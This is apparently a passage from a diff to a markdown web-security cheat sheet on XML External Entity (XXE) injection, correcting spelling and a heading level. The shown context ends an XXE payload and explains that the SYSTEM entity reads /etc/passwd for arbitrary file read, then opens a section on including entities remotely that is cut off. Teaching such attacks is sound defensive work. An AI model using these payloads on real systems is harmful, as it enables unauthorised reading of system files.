Angus-C-git/SecSheets/Web/Injection/XXE/XXE.md

 ]>
 <out>&payloadEntity;</out>
 ```
-+ Here the SYSTEM keyword reteives arbitary resources from a URI `/etc/passwd` to insert into the XML document
++ Here the SYSTEM keyword retrieves arbitrary resources from a URI `/etc/passwd` to insert into the XML document
-+ In this way we can achive arbitary read
++ In this way we can achieve arbitrary read

-### Include Entities Remotely
+#### Include Entities Remotely

 ```
 <?xml version="1.0"?>